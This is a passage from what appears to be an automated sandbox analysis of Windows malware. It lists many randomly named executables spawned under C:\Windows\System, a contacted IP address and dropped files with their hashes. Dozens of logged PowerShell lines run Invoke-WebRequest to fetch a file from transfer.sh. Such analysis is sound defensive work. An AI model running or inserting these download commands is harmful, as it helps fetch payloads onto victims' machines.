  C:\Windows\System\yjmfiqV.exe
  2⤵
  PID:7912
- C:\Windows\System\XGFOWpt.exe
  C:\Windows\System\XGFOWpt.exe
  2⤵
  PID:7344
- C:\Windows\System\ETXAJpR.exe
  C:\Windows\System\ETXAJpR.exe
  2⤵
  PID:7340
- C:\Windows\System\AgTMFQX.exe
  C:\Windows\System\AgTMFQX.exe
  2⤵
  PID:7216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:2008
- C:\Windows\System\GDIdYJI.exe
  C:\Windows\System\GDIdYJI.exe
  2⤵
  PID:3428
- C:\Windows\System\PGXxKxu.exe
  C:\Windows\System\PGXxKxu.exe
  2⤵
  PID:6676
- C:\Windows\System\KEOWefI.exe
  C:\Windows\System\KEOWefI.exe
  2⤵
  PID:6644
- C:\Windows\System\fghdzdC.exe
  C:\Windows\System\fghdzdC.exe
  2⤵
  PID:6156
- C:\Windows\System\HPXwszk.exe
  C:\Windows\System\HPXwszk.exe
  2⤵
  PID:7232
- C:\Windows\System\ASTVPCh.exe
  C:\Windows\System\ASTVPCh.exe
  2⤵
  PID:944
- C:\Windows\System\HIMwKhi.exe
  C:\Windows\System\HIMwKhi.exe
  2⤵
  PID:7040
- C:\Windows\System\lvSAzGs.exe
  C:\Windows\System\lvSAzGs.exe
  2⤵
  PID:3452
- C:\Windows\System\ccEHGlS.exe
  C:\Windows\System\ccEHGlS.exe
  2⤵
  PID:7088
- C:\Windows\System\FRfhsPX.exe
  C:\Windows\System\FRfhsPX.exe
  2⤵
  PID:8176
- C:\Windows\System\axxlBeW.exe
  C:\Windows\System\axxlBeW.exe
  2⤵
  PID:8160
- C:\Windows\System\pfZGUgH.exe
  C:\Windows\System\pfZGUgH.exe
  2⤵
  PID:8140
- C:\Windows\System\qdCJImK.exe
  C:\Windows\System\qdCJImK.exe
  2⤵
  PID:8124
- C:\Windows\System\UkWKFpX.exe
  C:\Windows\System\UkWKFpX.exe
  2⤵
  PID:7424
- C:\Windows\System\HdTLTTJ.exe
  C:\Windows\System\HdTLTTJ.exe
  2⤵
  PID:7860
- C:\Windows\System\jOTmVTa.exe
  C:\Windows\System\jOTmVTa.exe
  2⤵
  PID:7800
- C:\Windows\System\CqRdKxh.exe
  C:\Windows\System\CqRdKxh.exe
  2⤵
  PID:7736
- C:\Windows\System\XSqFyMN.exe
  C:\Windows\System\XSqFyMN.exe
  2⤵
  PID:7672
- C:\Windows\System\XNJbzus.exe
  C:\Windows\System\XNJbzus.exe
  2⤵
  PID:7540
- C:\Windows\System\elLzekg.exe
  C:\Windows\System\elLzekg.exe
  2⤵
  PID:7820
- C:\Windows\System\NQushbb.exe
  C:\Windows\System\NQushbb.exe
  2⤵
  PID:4832
- C:\Windows\System\GhBUNkZ.exe
  C:\Windows\System\GhBUNkZ.exe
  2⤵
  PID:8000
- C:\Windows\System\NAJOkvE.exe
  C:\Windows\System\NAJOkvE.exe
  2⤵
  PID:7936
- C:\Windows\System\KIciVHP.exe
  C:\Windows\System\KIciVHP.exe
  2⤵
  PID:7872
- C:\Windows\System\dTeifZQ.exe
  C:\Windows\System\dTeifZQ.exe
  2⤵
  PID:7604
- C:\Windows\System\vsRVoti.exe
  C:\Windows\System\vsRVoti.exe
  2⤵
  PID:8112
- C:\Windows\System\QRdEfsQ.exe
  C:\Windows\System\QRdEfsQ.exe
  2⤵
  PID:8048
- C:\Windows\System\cWQfSYR.exe
  C:\Windows\System\cWQfSYR.exe
  2⤵
  PID:7812
- C:\Windows\System\wMdGqbl.exe
  C:\Windows\System\wMdGqbl.exe
  2⤵
  PID:7748
- C:\Windows\System\fTKLZEZ.exe
  C:\Windows\System\fTKLZEZ.exe
  2⤵
  PID:7656
- C:\Windows\System\sajWhRk.exe
  C:\Windows\System\sajWhRk.exe
  2⤵
  PID:7588
- C:\Windows\System\FWCuJmn.exe
  C:\Windows\System\FWCuJmn.exe
  2⤵
  PID:7652
- C:\Windows\System\crsmPGN.exe
  C:\Windows\System\crsmPGN.exe
  2⤵
  PID:7356
- C:\Windows\System\cTxlYky.exe
  C:\Windows\System\cTxlYky.exe
  2⤵
  PID:7896
- C:\Windows\System\hgEIyfl.exe
  C:\Windows\System\hgEIyfl.exe
  2⤵
  PID:7880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:5004
- C:\Windows\System\hHWrKoO.exe
  C:\Windows\System\hHWrKoO.exe
  2⤵
  PID:7864
- C:\Windows\System\xELjvey.exe
  C:\Windows\System\xELjvey.exe
  2⤵
  PID:7848
- C:\Windows\System\widWLcM.exe
  C:\Windows\System\widWLcM.exe
  2⤵
  PID:7596
- C:\Windows\System\MExfJhy.exe
  C:\Windows\System\MExfJhy.exe
  2⤵
  PID:7580
- C:\Windows\System\ZapIsmB.exe
  C:\Windows\System\ZapIsmB.exe
  2⤵
  PID:7564
- C:\Windows\System\bmdCrTU.exe
  C:\Windows\System\bmdCrTU.exe
  2⤵
  PID:7548
- C:\Windows\System\wgIvXJm.exe
  C:\Windows\System\wgIvXJm.exe
  2⤵
  PID:7316
- C:\Windows\System\sIStPSz.exe
  C:\Windows\System\sIStPSz.exe
  2⤵
  PID:7300
- C:\Windows\System\nMbTlKH.exe
  C:\Windows\System\nMbTlKH.exe
  2⤵
  PID:2880
- C:\Windows\System\dsYswOW.exe
  C:\Windows\System\dsYswOW.exe
  2⤵
  PID:1744
- C:\Windows\System\gBfkbVt.exe
  C:\Windows\System\gBfkbVt.exe
  2⤵
  PID:1648
- C:\Windows\System\kfWDKuU.exe
  C:\Windows\System\kfWDKuU.exe
  2⤵
  PID:1244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7408
- C:\Windows\System\vAYvezY.exe
  C:\Windows\System\vAYvezY.exe
  2⤵
  PID:6980
- C:\Windows\System\OfeaVoN.exe
  C:\Windows\System\OfeaVoN.exe
  2⤵
  PID:6964
- C:\Windows\System\MMRGjWQ.exe
  C:\Windows\System\MMRGjWQ.exe
  2⤵
  PID:6948
- C:\Windows\System\MYonivG.exe
  C:\Windows\System\MYonivG.exe
  2⤵
  PID:6932
- C:\Windows\System\ZfVYezz.exe
  C:\Windows\System\ZfVYezz.exe
  2⤵
  PID:6632
- C:\Windows\System\KIgCSGr.exe
  C:\Windows\System\KIgCSGr.exe
  2⤵
  PID:6616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
    3⤵
    PID:7576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:2700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:3088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:1992

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:4272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:4424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:4416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:5128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:5408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:5696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://www.transfer.sh" -OutFile "file"
1⤵
PID:8096

Network

No results found

3.120.209.58:8080

152 B
3
3.120.209.58:8080

52 B
1

No results found

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f080b37b024d0b6be4a89bc293e13a8f

SHA1
c8578beeada73ecca676cf104d0df93ba50b223f

SHA256
89b80ef05718a93c34edb8042e28a0ad3147b5465546dbcc764650717e43ab51

SHA512
ef7a537d6a8e40f45f08d0851cc8db5b821616c2e17980f64423713f193c1ce70b3cbc36517240888be3457cd9467c7b6b68ef42ca0e20f4f723742353023737

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f080b37b024d0b6be4a89bc293e13a8f

SHA1
c8578beeada73ecca676cf104d0df93ba50b223f

SHA256
89b80ef05718a93c34edb8042e28a0ad3147b5465546dbcc764650717e43ab51

SHA512
ef7a537d6a8e40f45f08d0851cc8db5b821616c2e17980f64423713f193c1ce70b3cbc36517240888be3457cd9467c7b6b68ef42ca0e20f4f723742353023737

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f080b37b024d0b6be4a89bc293e13a8f

SHA1
c8578beeada73ecca676cf104d0df93ba50b223f

SHA256
89b80ef05718a93c34edb8042e28a0ad3147b5465546dbcc764650717e43ab51

SHA512
ef7a537d6a8e40f45f08d0851cc8db5b821616c2e17980f64423713f193c1ce70b3cbc36517240888be3457cd9467c7b6b68ef42ca0e20f4f723742353023737

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f080b37b024d0b6be4a89bc293e13a8f

SHA1
c8578beeada73ecca676cf104d0df93ba50b223f

SHA256
89b80ef05718a93c34edb8042e28a0ad3147b5465546dbcc764650717e43ab51

SHA512
ef7a537d6a8e40f45f08d0851cc8db5b821616c2e17980f64423713f193c1ce70b3cbc36517240888be3457cd9467c7b6b68ef42ca0e20f4f723742353023737

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZK8LPGMJ7MPP7DLMEZW5.temp

Filesize
7KB

MD5
f080b37b024d0b6be4a89bc293e13a8f

SHA1
c8578beeada73ecca676cf104d0df93ba50b223f

SHA256
89b80ef05718a93c34edb8042e28a0ad3147b5465546dbcc764650717e43ab51

SHA512
ef7a537d6a8e40f45f08d0851cc8db5b821616c2e17980f64423713f193c1ce70b3cbc36517240888be3457cd9467c7b6b68ef42ca0e20f4f723742353023737

Download Submit
C:\Windows\system\AiyLpAn.exe

Filesize
1.3MB

MD5
f31be5d300055b4ce2b2e88298cf343e

SHA1
cd175fda792402cce66e3d4e7ff26c05c6e16534

SHA256
c0ddcdd0aec371bac62dc316df7cadbf3c717f3de487fa996107e894e6b986b0

SHA512
606376bd0903f828a1ec75ebc3bb7fee8f06ad517a13c25e57be60c53172cdcee4acf45041d464012515dd7bba8c9e7236f6e099c913a9a0c18a29aa56cbe8fe

Download Submit
C:\Windows\system\BjmfRxU.exe

Filesize
1.3MB

MD5
9369f6ead2c0dd2b8fcae2a9a6a4b642

SHA1
d34306fe58a838b34fba7d084b42c87de58b307b

SHA256
a83b904b83de5296d80ddd714f7b1fd0c6fd5dba2a6435a53d60ea2d35f8a176

SHA512
f45dbd986499652773d01c332a906643a99acae2f3c6d939bba90573b9fe8827e5ce7381cb0c855ac642b38ebf7f0ff60820bdb3d98c99fa28916957252898a8

Download Submit
C:\Windows\system\CatSeWy.exe

Filesize
1.3MB

MD5
2b260f7bc308a2b0e2b4651aba33a262

SHA1
6d6bf33c9a9f52748a707bb80ff753706089b389

SHA256
8b577ac028beffb6f3589087f2b7ba81dd2bbb8cd84031c59d11693bf6323970

SHA512
e0519ed8a3ae7e650bd40c02249d45491b7e079f4021bb0b015746b1a1b7d8531b92830827550f54cb4d3ed35c474ce7f737fd39112c2a3a781dfb95e2c9467c

Download Submit
C:\Windows\system\EtYXiAc.exe

Filesize
1.3MB

MD5
444218c9bef9ae359d12e16c642e59d7

SHA1
d2c36f4809ab2d15f493ab6986527c075d47ee07

SHA256
eeb64ac96d5fc29ceb1271e6aa05556d112059c655d53f81f4d2df7e148ec21b

SHA512
0846bb569f9a796372e009148b83be3bb884cb3b7a6ff3f56e453603cec00f37e2ab2ecb4584428c6c2bb67f5467adea327758119a3c638dd8ad932ce05e6976

Download Submit
C:\Windows\system\GsCtCoq.exe

Filesize
1.3MB

MD5
ea5555af553338c5d0941a3f7f1f1c4a

SHA1
6c9dcc6ba10ca16a86eea809513e0c0f11a75a6c

SHA256
ea021c188d52051f78de7a118ade1b07263bbcc6de488c3a04ad4bd91c5792a4

SHA512
f8441b7024e0b3dbddd228f5db4572e5cee0a978922b34fabc994b9f80d77097c61a6849e3c9f83f07287b8695b4e0f36e72f18fa683bb715c2dc4dccb12766e

Download Submit
C:\Windows\system\IgkJztv.exe

Filesize
1.3MB

MD5
2f6794f9e67ffcb14cce024e302d15e4

SHA1
2c58a617fcfd5592fd44784b37051db3bc43c098

SHA256
a3d11dafbc38e19e632f028acd31696381a04faa42008be1c3decf7ed63cdbb6

SHA512
dcc3a3692f1cf1ff3cb24319046d76039c0ec4a3a934801e01d379db3611d60b43f736b3ff77c1441551672fc37582793d8fcbbc3f1328e28d2daaa2b57a4bde

Download Submit
C:\Windows\system\JYHORJq.exe

Filesize
1.3MB

MD5
7209aee8531fd7ec2ab9a943b9597903

SHA1
6aebfafd67ed8443bb55ec0f624ba52d63d5c1e4

SHA256
bdb916b568c449a99b0e6a7ac0a1e394dbb4516b09df52d206d211626d0602c7

SHA512
c2ea1205962f6b76816ad1713043d6ce76a8b9b9f322ced1dc7ba9cab9ea1dfa40fb758cc9f443aa05c5eb1f4645aed1fb7cd0622e61e33312d23f3d5e0c7f7b

Download Submit
C:\Windows\system\QdgApys.exe

Filesize
1.3MB

MD5
a728ebf440a21d5e83f05a84df46a652

SHA1
f94dcd4f73ad567d2ccaf565200ec96b25b66939

SHA256
c93820c0268964f91d1c26b7b1f9804566a518b55ba4e5b53f71c4ccab5f05e9

SHA512
9145795508b9e00561e9be867726ebbcf686477640b13563b47a8a453d1cbf5087c5d1108ab2cfe0985209651df9851c9912cc92bd23f82bf08896ae5be92982

Download Submit
C:\Windows\system\SYFnzoR.exe

Filesize
1.3MB

MD5
09fad22b6d49c9715ee3f6ff7842e3b6

SHA1
15f7701918f84b4175e6cde270aab0f6a8b27c4e

SHA256
7850802de9f68786c67e62ccd7642f5372238699ad7d13ad717d7c002fb23955

SHA512
8755dc4b9b5f41dafada7f62765e15e9798f45a127ce7b97fc907dcfc53977eac4897fba5529b5822b313a58fc56c5af3e8a88d0f638c7aad3a0e4d55ceca427

Download Submit
C:\Windows\system\SuGakjV.exe

Filesize
1.3MB

MD5
86050e209418ce101b59fee366bd1079

SHA1
1c424c03dffcacdcd41add92ec70901a85c4d83e

SHA256
5a949cf2e3af80359b3207e1b2140aafc2a3162cf3478d3b35eef090fb4a7217

SHA512
1a0459c2712bfbb3a2036b1ae0392ed3764c5c08d1baff322c36988cd3049ed5cd0d6618bb9461b7a150778e2eb7dfda737137c21edec07ed632dae5af995511

Download Submit
C:\Windows\system\TcWdHpq.exe

Filesize
1.3MB

MD5
f55e612a0fa499636a890241645943d8

SHA1
d95662cf126f4d6d727ea2a2dabab6b2c3673e4a

SHA256
e9286345778eca3bdaee058eb731ee640cc743a27c350bbcebec9465ba44df4c

SHA512
d0f3758aa18327ddca4b624782f0880803ff53035cad8439fd795077946733e8a6df2d58ccbda85d5277ca57b081e95a5704706d12d30a68fb4e7c9b8908e23a

Download Submit
C:\Windows\system\VbIGFaU.exe

Filesize
1.3MB

MD5
0affea72590af51add8bca8adabcf2b2

SHA1
700af60104a0c75b669fb6b763464834ce291118

SHA256
3d42ded14eacb79523c7fc309f1a04eb4d4173d0f15f9bcf4fd9678bfc0de43e

SHA512
b5cbd5b48e97f26fd15ad2bba79794c9c8ac2628c12c3df2ad1c708d7fab0de8152455707e8da96fa659a1bb412779272ff49e314e532b74dcab5275e7d3bb01

Download Submit
C:\Windows\system\VrKlbAu.exe

Filesize
1.3MB

MD5
ed5dea58e3c167faeaf5cd417e10f9df

SHA1
6c7248a2e5ea6f3e15ce8e7c38d1956904ede0f4

SHA256
871b57aa8b5915d994afe773c001f6e5e805653a107a52c1f691d790773ae233

SHA512
94aef612c7197d64f252b4a0702eaccfe9bc58e18ae7f77f9e8746127b80ba3bd86fd026ee250cef7fee8389007025744657fa9f850baa2e0da824f58e1beba6

Download Submit
C:\Windows\system\bcUKFqL.exe

Filesize
1.3MB

MD5
0e479f758b627cfab32a5ec031e6403b

SHA1
2cff6ad343e9817b34e48460faf20da8ee800d0a

SHA256
e32c5586492d3e97cfaf02522555e0f32c220e7e6c1532794104553bb7993b39

SHA512
60b213a008978b0effeb7c748c1e2999f0dcf8a3b4320694449f0eb92ce2c7b638fa0138ded621dde964ac8ecb3f92066c1c00fd5ddc405f0201532a03708bc6

Download Submit
C:\Windows\system\cHusyne.exe

Filesize
1.3MB

MD5
a9eb9e59178f09ae81801e1d277e2ebf

SHA1
4034d6c18f9bba9cf05cc163f80343932548cf40

SHA256
a74553c61b1f99e1b9ea0fc7976fa84e1ff238c791fe7672d28a571b962e21bf

SHA512
dff1a44e65df94fdda2a17f2b0cd2b58cf59d80686a20b15ae9a097f931d6b80410f8459035c8c902d466ed7dea9bd3dc84a6d82b492969be1b00ff40585308f

Download Submit
C:\Windows\system\eIQXwUG.exe

Filesize
1.3MB

MD5
cb1c0a71beade1b59e6bbdc1636fa7b6

SHA1
fc541d4af1b3f0df5b2f787bfdaa0172470429e3

SHA256
53068947d39acf3a6e5785180293caaa297686a1838189b36b114366b60f2a8d

SHA512
cc7dd3e51ab2b2b5d4733c6763be52fd3952fcfcd788b8572c4a1688b99cafca8bf060ce844efda0a441baae1d6aeb79b5af3c36ae1ab4c44e3dd92baa3f824c

Download Submit
C:\Windows\system\etBLKwF.exe

Filesize
1.3MB

MD5
198b3b06fe67b8143642fa49c1a49704

SHA1
b3425f069f0548c3a504172b992bfcfc7c1d4627

SHA256
5257105caf707cb6804b66fe18f7739ea0a86ad716aedc975ecbc1188c97a919

SHA512
057892a79831832ae4e45d28427e942df29f3e77d745536fb7147dbf8809879579fb0d6e8cd7a2ed75a68f4a71a4b9a4098e371a0f6146ce72a87b439e2341b3

Download Submit
C:\Windows\system\mbljTCn.exe

Filesize
1.3MB

MD5
4c2ca8da91e7b322c7039b3004c44ee5

SHA1
e311904c64dda77f16eabc0c6ca9879f24b8b651

SHA256
18cda51ac397f8929f9156dd7a1aca6ee94a7857fb39a0ccdc9a21a05ebafa8e

SHA512
84815073c5e771eebd3ecd78c9817fc044be685c08e16856d47a870f6a93a6c7f3fbcf07f339e077f1b524a7a1a7c43c164a4b76f6c7ad07d8f29b7b8d6b0737

Download Submit
C:\Windows\system\mdmbYhK.exe

Filesize
1.3MB

MD5
859fdfb5652be90a3b95ae978328969c

SHA1
a3f7c0d8705cc526d1d48bbfd1990176c0d78142

SHA256
028a7ef2d7f65717628d827e9959afd38cb99b7ac6fd4c061e5473461c7c5c2f

SHA512
bf4f52177cb5ba9a8da06e4089f94aa6a395760ba6f3f0053f162ba5c6a8aedd8b5195d156bd3eeac62751908b2945105bb180f30a96283e305ad7801e835737

Download Submit
C:\Windows\system\nHCnUaY.exe

Filesize
1.3MB

MD5
30cd95a470ad47d95ddb001f61bc51f9

SHA1
408c7afbf00aafe0d297f52a42727c33a55c306b

SHA256
f1fa7dd76f2faddc1aebe4b396a67c22321681a6a4b59bd23c8e782b0bf33021

SHA512
310760f0840656eaf1c8a76afd6ce51db92a47000e9ea71a272c4707769158f9c5c9191c36dede749496e21042d5e6e6a180293f88dcaac4b3dc252a7426ff38

Download Submit
C:\Windows\system\oBCNiJE.exe

Filesize
1.3MB

MD5
f11132562860690dde470d16d3642a34

SHA1
178090cb789534bb8f7d465ea11494fab6d42e93

SHA256
4f2975ee86a3fe12e6d6b8afd4da8ff5f71996350b13fa8013d304c64250e88f

SHA512
62f39b20cb1f7f6948288de5d9e7ec9792adcad59aa3d84828636b3fd0219b3c020240ac6e154dd6cdb43e651e0b60828affc0c0bad9b055ae4e7a1ddd107890

Download Submit
C:\Windows\system\oBCNiJE.exe

Filesize
1.3MB

MD5
f11132562860690dde470d16d3642a34

SHA1
178090cb789534bb8f7d465ea11494fab6d42e93

SHA256
4f2975ee86a3fe12e6d6b8afd4da8ff5f71996350b13fa8013d304c64250e88f

SHA512
62f39b20cb1f7f6948288de5d9e7ec9792adcad59aa3d84828636b3fd0219b3c020240ac6e154dd6cdb43e651e0b60828affc0c0bad9b055ae4e7a1ddd107890

Download Submit
C:\Windows\system\qIlxUpa.exe

Filesize
1.3MB

MD5
0bbbda7c81e0fdcaa28babe9d791cc17

SHA1
490a0b468d153bedcb840951b7ff0f22c7a32ffe

SHA256
071dd04060b61243483307922758a871c182e41877f38f9ee5243c2173818e03

SHA512
9b2f3b0ed98a53390c0396d8d94ef67fc2d8df46402c108f7ada01d9ccb2ad0f4a6fc29875644d939867f7985557e183b582b73ba558b826d03874da7d385455

Download Submit
C:\Windows\system\rhtpklo.exe

Filesize
1.3MB

MD5
607b0d48d59c1de84d8224f103c5ddf2

SHA1
fc0aa6a7f10ecec1a291b09a27bfd8ca013e96df

SHA256
6e88d5abc3b05f1747853df44fe1caa5502ea6fcd0569a2dcf4cdbd89c77d9a3

SHA512
3fd28b6fc1beb49a9575d34d1df5134c0b45ce23fc18ba48973142655de111cd4dca4ae4c293d3a4d9ee86d89993a9ef53b7e3ab930f874f0ab464ab6e54b491

Download Submit
C:\Windows\system\sVZOxkx.exe

Filesize
1.3MB

MD5
5ee3a06b12678998f3261a63c2654e42

SHA1
95de9773a37d0dad68c25dd6112578b9fe2dc948

SHA256
7551506f6887785c7fb9710e1bca9684b102169ce7ccb428f613b54280a64984

SHA512
eb93a6118f6d566b53da20bb19ee87517de40558880b82b006bcd83617706ca75c0e5691c87fd90002ac9be0838d6ba7df1d5120c8416db6564ab83ce7e7af4c

Download Submit
C:\Windows\system\tSqshlr.exe

Filesize
1.3MB

MD5
9189791a0d6213cc3687e4453d40cfdb

SHA1
2327d68a44427ce0fe6dee5ae437ee14541eed69

SHA256
f6c4618e5e3df741275e2e515a4f9d6256926f1c6e2898bac9b4e80ea223197f

SHA512
dc41f2dabc99175023c7e44a3ab850c9c9f4c68476f96c64d2d98c71c4e693d961ab8df6f6b0ba9719bb3cb675571a94187a361ef7e6bd7a5e3298ce14014137

Download Submit
C:\Windows\system\tiTuvZG.exe

Filesize
1.3MB

MD5
b2fd31a5647452150d0168bbfd155ef4

SHA1
cb08a62474eac4d55081e6d02f8c2bb999e7fbc8

SHA256
967e90d3c0e27d09be5826f8e89f27234027b7446a37ea380dacd602264066da

SHA512
f33307785b7ca3be8055f41cb94ff1f35c953d046537e9cdc35cadf884bf3680dc905bee0148a77bdee40997e805ffb16b52e9be75736b3154a9e4d4c8bc01cd

Download Submit
C:\Windows\system\vvoPmkU.exe

Filesize
1.3MB

MD5
85693ee04534cd19aa0edbb8004c8fdd

SHA1
cdfabf187b810f5d6c03c3af35fe3a99b4f70a9f

SHA256
d82e306af894fd028542c232347463325fc09230b555a208eee8dc7e190f6bf9

SHA512
85237b0daf283325f61724ff09bb8adc319ccc3e8c2fee3b05ea6e889595e0dd5ccd51c00b508636d638b40c6bca1f7aaf0e145de97299fa7d8b60560fa6e416

Download Submit
C:\Windows\system\xTlmePE.exe

Filesize
1.3MB

MD5
e926fa19abde0fd1218c621c49d35e96

SHA1
3079145c33b714fab23a51af72e21c8df2affbaa

SHA256
